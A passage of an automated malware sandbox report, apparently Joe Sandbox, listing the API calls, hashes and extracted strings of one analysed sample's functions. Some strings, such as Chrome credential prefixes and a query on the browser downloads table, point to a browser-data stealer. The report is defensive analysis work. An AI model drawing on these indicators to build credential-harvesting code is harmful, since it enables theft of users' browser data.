                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocLocal_memset
                                                                                                                                                                                                                                                    • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                                                                                                                                                                    • API String ID: 52611349-380572819
                                                                                                                                                                                                                                                    • Opcode ID: 8b2dfa91d6ecc90a2a0ebbd670046ea0ac5ffac86fa95cb960ab8629d6f1830a
                                                                                                                                                                                                                                                    • Instruction ID: e2ba32b757a615a2c51e82a4a7b521bc5c2d11637a02988549d7ee8fbf9160ea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b2dfa91d6ecc90a2a0ebbd670046ea0ac5ffac86fa95cb960ab8629d6f1830a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A41AF72A00118ABCF10EFA9DC469DE7BA8BF44720F158525F944E7281EB70DE458BA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0009C58F,?,00096F27,?), ref: 0009C019
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0009C58F,?,00096F27), ref: 0009C049
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0009C58F,?,00096F27,?), ref: 0009C075
                                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0009C58F,?,00096F27,?), ref: 0009C083
                                                                                                                                                                                                                                                      • Part of subcall function 0009B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0009B9C5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                                                                                                    • String ID: 'o
                                                                                                                                                                                                                                                    • API String ID: 3986731826-1509574331
                                                                                                                                                                                                                                                    • Opcode ID: 9242db7766dff460b83c9fc9f1b289d3d86607d82c8126dbc480484cd6498378
                                                                                                                                                                                                                                                    • Instruction ID: 1c888854aeb230a26734e7a5cb89f202e04295830c758fba463228b58954fd8d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9242db7766dff460b83c9fc9f1b289d3d86607d82c8126dbc480484cd6498378
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78416A71800209DFDF55DFA9C880ADEBBF8FF88310F10025AE855EA256E3349945DFA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0008F2C7
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0008F2E6
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 0008F320
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                    • API String ID: 3404309857-4289949731
                                                                                                                                                                                                                                                    • Opcode ID: 196374c444b7728cd25a3b052ca9c569f639f77ccbf974969ca7d341fd70dbd4
                                                                                                                                                                                                                                                    • Instruction ID: 00ec4420b9361fdd016624bfcfde74c0323d19a6c4922819c7b364bdb067122e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 196374c444b7728cd25a3b052ca9c569f639f77ccbf974969ca7d341fd70dbd4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D115A71700607AFDB04FFBCE885AA9B3A5BB053247544539F596CB682C7B0EA818791
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 000894AB
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 000894C6
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                    • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                    • API String ID: 2500673778-2241552939
                                                                                                                                                                                                                                                    • Opcode ID: 86680a295c9b1127b47c6b509af5a0e941b8cf0f482ed11a9781b1d746a17e53
                                                                                                                                                                                                                                                    • Instruction ID: 9264c4198bea074a1fa3a2a71f5099ce2b0d90525f6c07d5f2c1aff4a2887775
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86680a295c9b1127b47c6b509af5a0e941b8cf0f482ed11a9781b1d746a17e53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5671B432D00119EFCF01FBA4ED468EEB7B5FF54301B514061F990BB162DB60AE1A9BA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3576935931-0
                                                                                                                                                                                                                                                    • Opcode ID: 757893ecfc6886bba734157172402b99b3502d633106a42b4f55e55e053d27b7
                                                                                                                                                                                                                                                    • Instruction ID: 5e01d92e97761b1c75cb47b0040de561cbf3d85fcab3f361a325494ad920d6de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 757893ecfc6886bba734157172402b99b3502d633106a42b4f55e55e053d27b7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B311E732808D11EBDF317BF8BC05A9E37D4BF463B2F204526F849AA152DE3489809691
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(?,00000000,?,?,?,00093794,00000000,00000010), ref: 00092119
                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(002DE918,?,00000000,?), ref: 00092132
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00092144
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00092156
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: %s%s
                                                                                                                                                                                                                                                    • API String ID: 1206339513-3252725368
                                                                                                                                                                                                                                                    • Opcode ID: 4bad9d7077d2a7908e954373bf9cb986178edd2865d22ad83826d4faa10183ea
                                                                                                                                                                                                                                                    • Instruction ID: cf759bcea7d58c3616399261573219e1b8548197d891e25e8f1ed358dbb521d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bad9d7077d2a7908e954373bf9cb986178edd2865d22ad83826d4faa10183ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0E9326021157FDF012F59EC4CDAB7FACEF556A57020022F9089A221C7715D2186E1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 000A6725
                                                                                                                                                                                                                                                      • Part of subcall function 000A4954: __getptd_noexit.LIBCMT ref: 000A4957
                                                                                                                                                                                                                                                      • Part of subcall function 000A4954: __amsg_exit.LIBCMT ref: 000A4964
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 000A673C
                                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 000A674A
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 000A675A
                                                                                                                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 000A676E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 938513278-0
